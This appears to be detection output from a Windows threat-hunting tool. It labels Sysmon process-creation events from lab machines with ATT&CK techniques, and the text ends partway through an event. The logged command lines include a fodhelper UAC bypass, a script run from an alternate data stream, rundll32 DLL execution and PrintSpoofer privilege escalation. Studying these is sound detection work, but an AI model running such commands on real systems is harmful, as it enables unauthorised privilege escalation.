[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( &quot;C:\Windows\system32\whoami.exe&quot;) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-05-02T18:01:57.418442Z"">
</TimeCreated>
<EventRecordID>110435</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3068"" ThreadID=""2232"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-05-02 18:01:57.417</Data>
<Data Name=""ProcessGuid"">747F3D96-B595-5EAD-0000-00106BFDC200</Data>
<Data Name=""ProcessId"">6004</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">whoami.exe</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-6ABB-5EAD-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
<Data Name=""ParentProcessGuid"">747F3D96-B592-5EAD-0000-0010D4CDC200</Data>
<Data Name=""ParentProcessId"">1428</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,User Name : ( NT AUTHORITY\SYSTEM ) with Command Line : ( &quot;C:\Windows\system32\whoami.exe&quot; ) contain suspicious command ( whoami.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-05-02T18:01:57.418442Z"">
</TimeCreated>
<EventRecordID>110435</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3068"" ThreadID=""2232"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-05-02 18:01:57.417</Data>
<Data Name=""ProcessGuid"">747F3D96-B595-5EAD-0000-00106BFDC200</Data>
<Data Name=""ProcessId"">6004</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">whoami.exe</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-6ABB-5EAD-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
<Data Name=""ParentProcessGuid"">747F3D96-B592-5EAD-0000-0010D4CDC200</Data>
<Data Name=""ParentProcessId"">1428</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-12T13:06:04.075706Z"">
</TimeCreated>
<EventRecordID>342416</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3344"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-08-12 13:06:04.074</Data>
<Data Name=""ProcessGuid"">747F3D96-E93C-5F33-0000-0010A6F00E00</Data>
<Data Name=""ProcessId"">8032</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-E909-5F33-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-E93B-5F33-0000-001003BA0E00</Data>
<Data Name=""ParentProcessId"">7920</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wermgr.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wermgr.exe -upload</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /name Microsoft.BackupAndRestoreCenter ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-09T03:25:25.067945Z"">
</TimeCreated>
<EventRecordID>11267</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1988"" ThreadID=""228"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-09 03:25:24.677</Data>
<Data Name=""ProcessGuid"">365ABB72-9DA4-5CD3-0000-00107F7A2F00</Data>
<Data Name=""ProcessId"">2920</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /name Microsoft.BackupAndRestoreCenter</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Local\Temp\onedrive\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-94CD-5CD3-0000-0020DD3A0100</Data>
<Data Name=""LogonId"">0x13add</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-9DA4-5CD3-0000-00102E692F00</Data>
<Data Name=""ParentProcessId"">3184</Data>
<Data Name=""ParentImage"">C:\Windows\System32\sdclt.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\sdclt.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557370343.531513,2019-05-09T06:52:23.531513+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /C &quot;C:\Windows\wscript.exe &quot;C:\Users\IEUser\AppData:tghjx5xz2ky.vbs&quot;&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-09T02:52:23.531513Z"">
</TimeCreated>
<EventRecordID>11242</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1988"" ThreadID=""228"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-09 02:52:23.515</Data>
<Data Name=""ProcessGuid"">365ABB72-95E7-5CD3-0000-001004970F00</Data>
<Data Name=""ProcessId"">3784</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /C &quot;C:\Windows\wscript.exe &quot;C:\Users\IEUser\AppData:tghjx5xz2ky.vbs&quot;&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Local\Temp\onedrive\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-94CD-5CD3-0000-0020DD3A0100</Data>
<Data Name=""LogonId"">0x13add</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-9570-5CD3-0000-00103FC90A00</Data>
<Data Name=""ParentProcessId"">1900</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436045.252684,2019-07-30T01:34:05.252684+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c rundll32 AllTheThings.dll,EntryPoint )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:05.237600Z"">
</TimeCreated>
<EventRecordID>4965</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:05.213</Data>
<Data Name=""ProcessGuid"">747F3D96-664D-5D3F-0000-0010F1498C00</Data>
<Data Name=""ProcessId"">6836</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c rundll32 AllTheThings.dll,EntryPoint</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1088] Bypass User Account Control - Process,1564827248.681363,2019-08-03T14:14:08.681363+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-03T10:14:08.472102Z"">
</TimeCreated>
<EventRecordID>5277</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-03 10:14:08.401</Data>
<Data Name=""ProcessGuid"">747F3D96-5E70-5D45-0000-0010FCDD9D00</Data>
<Data Name=""ProcessId"">3656</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
<Data Name=""LogonId"">0x18d3b3</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-5E6F-5D45-0000-001014CA9D00</Data>
<Data Name=""ParentProcessId"">8180</Data>
<Data Name=""ParentImage"">C:\Windows\System32\fodhelper.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\fodhelper.exe&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1561018068.92556,2019-06-20T12:07:48.925560+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;cmd&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-06-20T08:07:48.925560Z"">
</TimeCreated>
<EventRecordID>8116</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2020"" ThreadID=""2088"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-06-20 08:07:48.909</Data>
<Data Name=""ProcessGuid"">365ABB72-3ED4-5D0B-0000-0010B2871A00</Data>
<Data Name=""ProcessId"">1440</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;cmd&quot;</Data>
<Data Name=""CurrentDirectory"">c:\ProgramData\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-3991-5D0B-0000-002029350100</Data>
<Data Name=""LogonId"">0x13529</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D05-5D0B-0000-001004220D00</Data>
<Data Name=""ParentProcessId"">816</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564827248.681363,2019-08-03T14:14:08.681363+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-03T10:14:08.472102Z"">
</TimeCreated>
<EventRecordID>5277</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-03 10:14:08.401</Data>
<Data Name=""ProcessGuid"">747F3D96-5E70-5D45-0000-0010FCDD9D00</Data>
<Data Name=""ProcessId"">3656</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
<Data Name=""LogonId"">0x18d3b3</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-5E6F-5D45-0000-001014CA9D00</Data>
<Data Name=""ParentProcessId"">8180</Data>
<Data Name=""ParentImage"">C:\Windows\System32\fodhelper.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\fodhelper.exe&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556610375.246489,2019-04-30T11:46:15.246489+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c echo msdhch &gt; \\.\pipe\msdhch ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T07:46:15.215239Z"">
</TimeCreated>
<EventRecordID>8575</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1876"" ThreadID=""1444"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 07:46:15.183</Data>
<Data Name=""ProcessGuid"">365ABB72-FD47-5CC7-0000-00106AF61D00</Data>
<Data Name=""ProcessId"">4088</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c echo msdhch &gt; \\.\pipe\msdhch</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-F6A1-5CC7-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-F6A1-5CC7-0000-001004550000</Data>
<Data Name=""ParentProcessId"">468</Data>
<Data Name=""ParentImage"">C:\Windows\System32\services.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\services.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1588442517.418442,2020-05-02T22:01:57.418442+04:00,,Threat,Critical,"Found User (NT AUTHORITY\SYSTEM) run Suspicious PowerShell commands that include (powershell, -c , -i ,powershell) in event with Command Line (powershell.exe) and Parent Image :C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe , Parent CommandLine (PrintSpoofer.exe -i -c powershell.exe) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-05-02T18:01:54.867394Z"">
</TimeCreated>
<EventRecordID>110434</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3068"" ThreadID=""2232"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-05-02 18:01:54.866</Data>
<Data Name=""ProcessGuid"">747F3D96-B592-5EAD-0000-0010D4CDC200</Data>
<Data Name=""ProcessId"">1428</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">PowerShell.EXE</Data>
<Data Name=""CommandLine"">powershell.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-6ABB-5EAD-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
